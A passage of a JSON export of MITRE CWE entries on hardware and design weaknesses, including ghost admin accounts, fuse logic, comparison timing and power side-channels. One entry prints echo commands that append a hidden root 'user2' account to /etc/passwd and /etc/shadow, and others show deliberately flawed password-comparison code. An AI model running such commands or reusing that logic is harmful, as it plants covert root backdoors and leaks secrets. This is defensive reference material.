example."},{"Phase":"Operation","Note":"May be introduced by improper handling or usage outside of rated operating environments (temperature, humidity, etc.)"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control"],"Impact":"DoS: Instability"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":{"xhtml:p":"While semiconductor-manufacturing companies implement several mechanisms to continuously improve the semiconductor manufacturing process to ensure reduction of defects, some defects can only be fixed after manufacturing. Post-manufacturing testing of silicon die is critical. Fault models such as stuck-at-0 or stuck-at-1 must be used to develop post-manufacturing test cases and achieve good coverage. Once the silicon packaging is done, extensive post-silicon testing must be performed to ensure that hardware logic implementing security functionalities is defect-free."}},{"Phase":"Operation","Description":{"xhtml:p":"Operating the hardware outside device specification, such as at extremely high temperatures, voltage, etc., accelerates semiconductor degradation and results in defects.  When these defects manifest as faults in security-critical, hardware modules, it results in compromise of security guarantees. Thus, operating the device within the specification is important."}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The network-on-chip implements a firewall for access control to peripherals from all IP cores capable of mastering transactions.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"A manufacturing defect in this logic manifests itself as a logical fault, which always sets the output of the filter to \\"allow\\" access."},"Body_Text":"Post-manufacture testing must be performed to ensure that hardware logic implementing security functionalities is defect-free."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1067"}},{"attr":{"@_External_Reference_ID":"REF-1068"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Modes_of_Introduction, Related_Attack_Patterns"}}},"1249":{"attr":{"@_ID":"1249","@_Name":"Application-Level Admin Tool with Inconsistent View of Underlying Operating System","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product provides an application for administrators to manage parts of the underlying operating system, but the application does not accurately identify all of the relevant entities or resources that exist in the OS; that is, the application\'s model of the OS\'s state is inconsistent with the OS\'s actual state.","Extended_Description":{"xhtml:p":["Many products provide web-based applications or other software for managing the underlying operating system. This is common with cloud, network access devices, home networking, and other systems.  When the management tool does not accurately represent what is in the OS - such as user accounts - then the administrator might not see suspicious activities that would be noticed otherwise.","For example, numerous systems utilize a web\\n\\t\\t\\t\\tfront-end for administrative control. They also offer\\n\\t\\t\\t\\tthe ability to add, alter, and drop users with various\\n\\t\\t\\t\\tprivileges as it relates to the functionality of the\\n\\t\\t\\t\\tsystem.  A potential architectural weakness may exist\\n\\t\\t\\t\\twhere the user information reflected in the web\\n\\t\\t\\t\\tinterface does not mirror the users in the underlying\\n\\t\\t\\t\\toperating system.  Many web UI or REST APIs use the\\n\\t\\t\\t\\tunderlying operating system for authentication; the\\n\\t\\t\\t\\tsystem\'s logic may also track an additional set of\\n\\t\\t\\t\\tuser capabilities within configuration files\\n\\t\\t\\t\\tand datasets for authorization capabilities. When\\n\\t\\t\\t\\tthere is a discrepancy between the user information in\\n\\t\\t\\t\\tthe UI or REST API\'s interface system and the\\n\\t\\t\\t\\tunderlying operating system\'s user listing, this may\\n\\t\\t\\t\\tintroduce a weakness into the system.  For example, if an\\n\\t\\t\\t\\tattacker compromises the OS and adds a new user\\n\\t\\t\\t\\taccount - a \\"ghost\\" account - then the attacker could escape detection if\\n\\t\\t\\t\\tthe management tool does not list the newly-added\\n\\t\\t\\t\\taccount.","This discrepancy could be exploited in several ways:","Many of these attacker scenarios can be\\n\\t\\t\\t\\trealized by leveraging separate vulnerabilities\\n\\t\\t\\t\\trelated to XSS, command injection, authentication\\n\\t\\t\\t\\tbypass, or logic flaws on the various systems."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["A rogue admin could insert a new account into a system that will\\npersist if they are terminated or wish to take action on a system that\\ncannot be directly associated with them.","An attacker can leverage a separate command injection attack available through the web interface to insert a ghost account with shell privileges such as ssh.","An attacker can leverage existing web interface APIs, manipulated in such a way that a new user is inserted into the operating system, and the user web account is either partially created or not at all.","An attacker could create an admin\\n\\t\\t\\t\\t\\t  account which is viewable by an administrator,\\n\\t\\t\\t\\t\\t  use this account to create the ghost account,\\n\\t\\t\\t\\t\\t  delete logs and delete the first created admin\\n\\t\\t\\t\\t\\t  account."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1250","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Ghost in the Shell"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The design might assume that the underlying OS does not change."},{"Phase":"Implementation","Note":"Assumptions about the underlying OS might be hard-coded into the application or otherwise in external data stores in a way that is not updated when the OS\'s state changes."}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Varies by Context"},{"Scope":"Accountability","Impact":"Hide Activities"},{"Scope":"Other","Impact":"Unexpected State"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Ensure that the admin tool refreshes its model of the underlying OS on a regular basis, and note any inconsistencies with configuration files or other data sources that are expected to have the same data."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Suppose that an attacker successfully gains root privileges on a Linux system and adds a new \'user2\' account:","Example_Code":{"attr":{"@_Nature":"attack","@_Language":"Other"},"xhtml:div":["echo \\"user2:x:0:0::/root:/\\" &gt;&gt; /etc/passwd;","echo\\n\\t\\t\\t\\t\\t  \\"user2:\\\\$6\\\\$IdvyrM6VJnG8Su5U\\\\$1gmW3Nm.IO4vxTQDQ1C8urm72JCadOHZQwqiH/nRtL8dPY80xS4Ovsv5bPCMWnXKKWwmsocSWXupUf17LB3oS.:17256:0:99999:7:::\\" &gt;&gt; /etc/shadow;"]},"Body_Text":["This new user2 account would not be noticed on the web interface, if the interface does not refresh its data of available users.","It could be argued that for this specific example, an attacker with root privileges would be likely to compromise the admin tool or otherwise feed it with false data.  However, this example shows how the discrepancy in critical data can help attackers to escape detection."]}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1070"}}},"Content_History":{"Submission":{"Submission_Name":"Tony Martin","Submission_Date":"2019-06-06"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"}}},"1250":{"attr":{"@_ID":"1250","@_Name":"Improper Preservation of Consistency Between Independent Representations of Shared State","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product has or supports multiple distributed components or sub-systems that are each required to keep their own local copy of shared data - such as state or cache - but the product does not ensure that all local copies remain consistent with each other.","Extended_Description":{"xhtml:p":["In highly distributed environments, or on systems with distinct physical components that operate independently, there is often a need for each component to store and update its own local copy of key data such as state or cache, so that all components have the same \\"view\\" of the overall system and operate in a coordinated fashion.  For example, users of a social media service or a massively multiplayer online game might be using their own personal computers while also interacting with different physical hosts in a globally distributed service, but all participants must be able to have the same \\"view\\" of the world.  Alternately, a processor\'s Memory Management Unit (MMU) might have \\"shadow\\" MMUs to distribute its workload, and all shadow MMUs are expected to have the same accessible ranges of memory.","In such environments, it becomes critical for\\n\\t\\tthe product to ensure that this \\"shared state\\" is\\n\\t\\tconsistently modified across all distributed systems.\\n\\t\\tIf state is not consistently maintained across all\\n\\t\\tsystems, then critical transactions might take place\\n\\t\\tout of order, or some users might not get the same\\n\\t\\tdata as other users.  When this inconsistency affects\\n\\t\\tcorrectness of operations, it can introduce\\n\\t\\tvulnerabilities in mechanisms that depend on\\n\\t\\tconsistent state."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"Cloud Computing","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-132"},"Intro_Text":"Suppose a processor\'s Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of \\"accessible\\" memory. Any time this accessible range changes (as per the processor\'s boot status), the main MMU sends an update message to all the shadow MMUs.","Body_Text":"Suppose the interconnect fabric does not prioritize such \\"update\\" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario."}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1069"}}},"Notes":{"Note":{"#text":"Issues related to state and cache - creation,\\n\\t\\tpreservation, and update - are a significant gap in\\n\\t\\tCWE that is expected to be addressed in future\\n\\t\\tversions.  It likely has relationships to concurrency\\n\\t\\tand synchronization, incorrect behavior order, and\\n\\t\\tother areas that already have some coverage in CWE,\\n\\t\\talthough the focus has typically been on independent\\n\\t\\tprocesses on the same operating system - not on\\n\\t\\tindependent systems that are all a part of a larger\\n\\t\\tsystem-of-systems.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"CWE Content Team","Submission_Date":"2020-02-13"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms"}}},"1251":{"attr":{"@_ID":"1251","@_Name":"Mirrored Regions with Different Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s architecture mirrors regions without ensuring that their contents always stay in sync.","Extended_Description":{"xhtml:p":["Having mirrored regions with different values might result in the exposure of sensitive information or possibly system compromise.","In the interest of increased performance, one might need to duplicate a resource. A cache memory is a common example of this concept, which keeps a \\"local\\" copy of a data element in the high speed cache memory. Unfortunately, this speed improvement comes with a downside, since the product needs to ensure that the local copy always mirrors the original copy truthfully. If they get out of sync, the computational result is no longer true.","During hardware design, memory is not the only item which gets mirrored. There are many other entities that get mirrored, as well: registers, memory regions, and, in some cases, even whole computational units. For example, within a multi-core processor, if all memory accesses for each and every core goes through a single Memory-Management Unit (MMU) then the MMU will become a performance bottleneck. In such cases, duplicating local MMUs that will serve only a subset of the cores rather than all of them may resolve the performance issue. These local copies are also called \\"shadow copies\\" or \\"mirrored copies.\\"","If the original resource never changed, local duplicate copies getting out of sync would never be an issue. However, the values of the original copy will sometimes change. When the original copy changes, the mirrored copies must also change, and change fast.","This situation of shadow-copy-possibly-out-of-sync-with-original-copy might occur as a result of multiple scenarios, including the following:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["After the values in the original copy change, due to some reason the original copy does not send the \\"update\\" request to its shadow copies.","After the values in the original copy change, the original copy dutifully sends the \\"update\\" request to its shadow copies, but due to some reason the shadow copy does not \\"execute\\" this update request.","After the values in the original copy change, the original copy sends the \\"update\\" request to its shadow copies, and the shadow copy executes this update request faithfully. However, during the small time period when the original copy has \\"new\\" values and the shadow copy is still holding the \\"old\\" values, an attacker can exploit the old values. Then it becomes a race condition between the attacker and the update process of who can reach the target, shadow copy first, and, if the attacker reaches first, the attacker wins.","The attacker might send a \\"spoofed\\" update request to the target shadow copy, pretending that this update request is coming from the original copy. This spoofed request might cause the targeted shadow copy to update its values to some attacker-friendly values, while the original copies remain unchanged by the attacker.","Suppose a situation where the original copy has a system of reverting back to its original value if it does not hear back from all the shadow copies that such copies have successfully completed the update request. In such a case, an attack might occur as follows: (1) the original copy might send an update request; (2) the shadow copy updates it; (3) the shadow copy sends back the successful completion message; (4) through a separate issue, the attacker is able to intercept the shadow copy\'s completion message. In this case, the original copy thinks that the update did not succeed, hence it reverts to its original value. Now there is a situation where the original copy has the \\"old\\" value, and the shadow copy has the \\"new\\" value."]}}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1250","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Whenever there are multiple, physically different copies of the same value that might change and the process to update them is not instantaneous and atomic, it is impossible to assert that the original and shadow copies will always be in sync - there will always be a time period when they are out of sync. To mitigate the consequential risk, the recommendations essentially are:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Make this out-of-sync time period as small as possible, and","Make the update process as robust as possible."]}}}},"Effectiveness":"Moderate"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-132"},"Intro_Text":"Suppose a processor\'s Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of \\"accessible\\" memory. Any time this accessible range changes (as per the processor\'s boot status), the main MMU sends an update message to all the shadow MMUs.","Body_Text":"Suppose the interconnect fabric does not prioritize such \\"update\\" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario."}},"Notes":{"Note":{"#text":"Issues related to state and cache - creation, preservation, and update - are a significant gap in CWE that is expected to be addressed in future versions. It has relationships to concurrency and synchronization, incorrect behavior order, and other areas that already have some coverage in CWE, although the focus has typically been on independent processes on the same operating system - not on independent systems that are all a part of a larger system-of-systems.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"1252":{"attr":{"@_ID":"1252","@_Name":"CPU Hardware Not Configured to Support Exclusivity of Write and Execute Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The CPU is not configured to provide hardware support for exclusivity of write and execute operations on memory. This allows an attacker to execute data from all of memory.","Extended_Description":{"xhtml:p":"CPUs provide a special bit that supports exclusivity of write and execute operations. This bit is used to segregate areas of memory to either mark them as code (instructions, which can be executed) or data (which should not be executed). In this way, if a user can write to a region of memory, the user cannot execute from that region and vice versa. This exclusivity provided by special hardware bit is leveraged by the operating system to protect executable space. While this bit is available in most modern processors by default, in some CPUs the exclusivity is implemented via a memory-protection unit (MPU) and memory-management unit (MMU) in which memory regions can be carved out with exact read, write, and execute permissions. However, if the CPU does not have an MMU/MPU, then there is no write exclusivity. Without configuring exclusivity of operations via segregated areas of memory, an attacker may be able to inject malicious code onto memory and later execute it."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Implement a dedicated bit that can be leveraged by the Operating System to mark data areas as non-executable. If such a bit is not available in the CPU, implement MMU/MPU (memory management unit / memory protection unit)."}},{"Phase":"Integration","Description":{"xhtml:p":"If MMU/MPU are not available, then the firewalls need to be implemented in the SoC interconnect to mimic the write-exclusivity operation."}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"MCS51 Microcontroller (based on 8051) does not have a special bit to support write exclusivity. It also does not have an MMU/MPU support. The Cortex-M CPU has an optional MPU that supports up to 8 regions.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"The optional MPU is not configured."},"Body_Text":"If the MPU is not configured, then an attacker will be able to inject malicious data into memory and execute it."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1076"}},{"attr":{"@_External_Reference_ID":"REF-1077"}},{"attr":{"@_External_Reference_ID":"REF-1078"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-13"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1253":{"attr":{"@_ID":"1253","@_Name":"Incorrect Selection of Fuse Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The logic level used to set a system to a secure state relies on a fuse being unblown. An attacker can set the system to an insecure state merely by blowing the fuse.","Extended_Description":{"xhtml:p":"Fuses are often used to store secret data, including security configuration data. When not blown, a fuse is considered to store a logic 0, and, when blown, it indicates a logic 1. Fuses are generally considered to be one-directional, i.e., once blown to logic 1, it cannot be reset to logic 0. However, if the logic used to determine system-security state (by leveraging the values sensed from the fuses) uses negative logic, an attacker might blow the fuse and drive the system to an insecure state."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart"},{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Integrity","Impact":["Modify Memory","Execute Unauthorized Code or Commands"]}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Logic should be designed in a way that blown fuses do not put the product into an insecure state that can be leveraged by an attacker."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["A chip implements a secure boot and uses the sensed value of a fuse \\n         \\"do_secure_boot\\" to determine whether to perform a secure boot or not. If this fuse \\n         value is \\"0\\", the system performs secure boot. Otherwise, it does not perform secure \\n         boot.","An attacker blows the \\"do_secure_boot\\" fuse to \\"1\\". After reset, the attacker loads a custom \\n         bootloader, and, since the fuse value is now \\"1\\", the system does not perform secure boot, \\n         and the attacker can execute their custom firmware image.","Since by default, a fuse-configuration value is a \\"0\\", an attacker can blow it to a \\"1\\" with \\n         inexpensive hardware.","If the logic is reversed, an attacker cannot easily reset the fuse. Note that, with \\n         specialized and expensive equipment, an attacker with full physical access might be able to \\"unblow\\" the fuse \\n         value to a \\"0\\"."]}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"74"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1080"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1254":{"attr":{"@_ID":"1254","@_Name":"Incorrect Comparison Logic Granularity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product\'s comparison logic is performed over a series of steps rather than across the entire string in one operation. If there is a comparison logic failure on one of these steps, the operation may be vulnerable to a timing attack that can result in the interception of the process for nefarious purposes.","Extended_Description":{"xhtml:p":"Comparison logic is used to compare a variety of objects including passwords, Message \\n         Authentication Codes (MACs), and responses to verification challenges. When comparison logic is \\n         implemented at a finer granularity (e.g., byte-by-byte comparison) and breaks in the case of a \\n         comparison failure, an attacker can exploit this implementation to identify when exactly \\n         the failure occurred. With multiple attempts, the attacker may be able to guesses the correct \\n         password/response to challenge and elevate their privileges."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"208","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Authorization"],"Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":{"xhtml:p":"The hardware designer should ensure that comparison logic is implemented so as to compare in one operation instead in smaller chunks."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider an example hardware module that checks a user-provided password to grant access to a user. The user-provided password is compared against a golden value in a byte-by-byte manner.","Example_Code":[{"#text":"always_comb @ (posedge clk)beginassign check_pass[3:0] = 4\u2019b0;for (i = 0; i &lt; 4; i++) beginif (entered_pass[(i*8 \u2013 1) : i] eq golden_pass([i*8 -1) : i])assign check_pass[i] = 1;continue;elseassign check_pass[i] = 0;break;endassign grant_access = (check_pass == 4\u2019b1111) ? 1\u2019b1: 1\u2019b0;end","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"","xhtml:br":["","","","","","","","","","","",""]},{"#text":"Either the comparison of the entire string should be done all at once or the attacker is not given an indication whether pass or fail happened by allowing the comparison to run through all bits before the grant_access signal is set.always_comb @ (posedge clk)beginassign check_pass[3:0] = 4\u2019b0;for (i = 0; i &lt; 4; i++) beginif (entered_pass[(i*8 \u2013 1) : i] eq golden_pass([i*8 -1) : i])assign check_pass[i] = 1;continue;elseassign check_pass[i] = 0;continue;endassign grant_access = (check_pass == 4\u2019b1111) ? 1\u2019b1: 1\u2019b0;end","attr":{"@_Nature":"informative"},"xhtml:br":["","","","","","","","","","","","","","","",""]}],"Body_Text":"Since the code breaks on an incorrect entry of password, an attacker can guess the correct password for that byte-check iteration with few repeat attempts."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-0984","Description":"The passwordCheck function in SAP Router 721 patch 117, 720 patch 411, 710 patch 029, and earlier terminates validation of a Route Permission Table entry password upon encountering the first incorrect character, which allows remote attackers to obtain passwords via a brute-force attack that relies on timing differences in responses to incorrect password guesses, aka a timing side-channel attack.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0984"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"26"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1079"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1255":{"attr":{"@_ID":"1255","@_Name":"Comparison Logic is Vulnerable to Power Side-Channel Attacks","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A device\'s real time power consumption may be monitored during security token evaluation and the information gleaned may be used to determine the value of the reference token.","Extended_Description":{"xhtml:p":"The power consumed by a device may be instrumented and monitored in real time. If the algorithm for evaluating security tokens is not sufficiently robust, the power consumption may vary by token entry comparison against the reference value. Further, if retries are unlimited, the power difference between a \\"good\\" entry and a \\"bad\\" entry may be observed and used to determine whether each entry itself is correct thereby allowing unauthorized parties to calculate the reference value."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1300","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1259","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The design of the algorithm itself may intrinsically allow the power side channel attack to be effective"},{"Phase":"Implementation","Note":"This weakness may be introduced during implementation despite a robust design that otherwise prevents exploitation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":["Modify Memory","Read Memory","Read Files or Directories","Modify Files or Directories","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Application Data","Modify Application Data","Hide Activities"],"Note":"As compromising a security token may result in complete system control, the impacts are relatively universal"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"The design phase must consider each check of a security token against a standard and the amount of power consumed during the check of a good token versus a bad token. The alternative is an all at once check where a retry counter is incremented PRIOR to the check."},{"Phase":"Architecture and Design","Description":"Another potential mitigation is to parallelize shifting of secret data (see example 2 below). Note that the wider the bus the more effective the result."},{"Phase":"Architecture and Design","Description":"An additional potential mitigation is to add random data to each crypto operation then subtract it out afterwards. This is highly effective but costly in performance, area, and power consumption. It also requires a random number generator."},{"Phase":"Implementation","Description":"If the architecture is unable to prevent the attack, using filtering components may reduce the ability to implement an attack, however, consideration must be given to the physical removal of the filter elements."},{"Phase":"Integration","Description":"During integration, avoid use of a single secret for an extended period (e.g. frequent key updates). This limits the amount of data compromised but at the cost of complexity of use."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Consider an example hardware module that checks a user-provided password (or PIN) to grant access to a user. The user-provided password is compared against a stored value byte-by-byte.","Example_Code":[{"#text":"static nonvolatile password_tries = NUM_RETRIES;dowhile (password_tries == 0) ; // Hang here if no more password triespassword_ok = 0;for (i = 0; i &lt; NUM_PW_DIGITS; i++)if (GetPasswordByte() == stored_password([i])password_ok |= 1; // Power consumption is different hereelsepassword_ok |= 0; // than from hereendif (password_ok &gt; 0)password_tries = NUM_RETRIES;break_to_Ok_to_proceedpassword_tries--;while (true)// Password 